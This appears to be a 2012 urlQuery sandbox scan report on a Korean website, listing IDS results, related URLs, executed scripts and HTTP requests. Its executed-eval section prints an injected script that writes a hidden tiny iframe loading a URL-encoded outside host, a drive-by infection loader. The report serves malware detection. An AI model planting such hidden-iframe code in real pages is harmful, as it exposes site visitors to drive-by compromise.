Overview

URL: http://promusic.com.ne.kr/
IP: 211.119.245.166
ASN: AS3786 LG DACOM Corporation
Location: Korea, Republic of
Report completed: 2012-11-14 04:48:46 CET
urlQuery Alerts: Detected malicious iframe injection


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (none)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro: No alerts detected
Snort w/ Sourcefire VRT: No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 211.119.245.166

Date                | Alerts / IDS | URL                                            | IP
2012-11-21 16:12:40 | 1 / 4        | http://chanjuri.com.ne.kr/2007050305/089.htm   | 211.119.245.166
2012-11-21 05:52:31 | 1 / 4        | http://chanjuri.com.ne.kr/2007050305/089.htm   | 211.119.245.166

Last 6 reports on ASN: AS3786 LG DACOM Corporation

Date                | Alerts / IDS | URL                                                                                    | IP
2013-04-08 10:39:59 | 0 / 0        | http://free-onlinednsmy.com                                                            | 220.149.236.151
2013-04-08 09:21:55 | 0 / 2        | http://shockit.woto.net/holyview/install_holyview4.exe                                 | 114.108.131.23
2013-04-08 04:36:37 | 0 / 6        | http://www.cheonanhotel.com/eng/free_bd/b_view.asp?b_type=d&b_idx=570                  | 211.174.62.127
2013-04-08 03:32:50 | 0 / 3        | http://www.seobongsa.com/bbs/zboard.php?id=bang                                        | 180.150.228.152
2013-04-08 03:25:31 | 0 / 3        | http://down.windviewer.com/setup_pid008_silent.exe                                     | 114.108.128.19
2013-04-08 03:23:02 | 0 / 4        | http://www.seobongsa.com/bbs/zboard.php?id=bang&page=18&select_arrange=headnum&desc (...) | 180.150.228.152



JavaScript

Executed Scripts (11)


Executed Evals (3)

#1 JavaScript::Eval (size: 799, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 5, repeated: 1)

asdas

#3 JavaScript::Eval (size: 4, repeated: 799)

n[i]

Executed Writes (6)

#1 JavaScript::Write (size: 82, repeated: 1)

  _dwiPID="+inside_statics+";  if(typeof(_dwiCatch) == "function") { _dwiCatch();}

#2 JavaScript::Write (size: 305, repeated: 1)

 <script>var Long_URL=document.domain; TMPdomain=Long_URL.split(".");if (TMPdomain.length==4) { ID = TMPdomain[0]; } else { ID = TMPdomain[TMPdomain.length - 4]; } document.writeln('<img src=http://statics.com.ne.kr/statics/visitcount.php3?ID='+ID+' boder=1 width=1 height=1 style=display:none>')</script>

#3 JavaScript::Write (size: 10, repeated: 2)

</script>

#4 JavaScript::Write (size: 114, repeated: 1)

<img src=http://statics.com.ne.kr/statics/visitcount.php3?ID=promusic boder=1 width=1 height=1 style=display:none>

#5 JavaScript::Write (size: 100, repeated: 1)

<script type="text/javascript" charset="euc-kr" src="http://log.inside.daum.net/dwi_log/js/dwi.js">

#6 JavaScript::Write (size: 9, repeated: 1)

<script>


HTTP Transactions (5)


Request Response
GET / HTTP/1.1

Host: promusic.com.ne.kr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 14 Nov 2012 03:48:08 GMT
Server: Apache/1.3.33 (Unix)
Cache-Control: post-check=1, pre-check=60
Set-Cookie: AccessLink=pass; path=/;
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /toolbar/statics/ HTTP/1.1

Host: icons.com.ne.kr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://promusic.com.ne.kr/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 14 Nov 2012 03:48:13 GMT
Server: Apache/1.3.36 (Unix) PHP/4.4.2
Last-Modified: Tue, 06 Jan 2009 01:06:10 GMT
Etag: "1ca805f-9c8-4962ae82"
Accept-Ranges: bytes
Content-Length: 2504
Connection: close
GET /favicon.ico HTTP/1.1

Host: promusic.com.ne.kr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: AccessLink=pass
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Wed, 14 Nov 2012 03:48:17 GMT
Server: Apache/1.3.33 (Unix)
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1

Host: promusic.com.ne.kr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: AccessLink=pass
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Wed, 14 Nov 2012 03:48:20 GMT
Server: Apache/1.3.33 (Unix)
Keep-Alive: timeout=15, max=997
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /dwi_log/js/dwi.js HTTP/1.1

Host: log.inside.daum.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://promusic.com.ne.kr/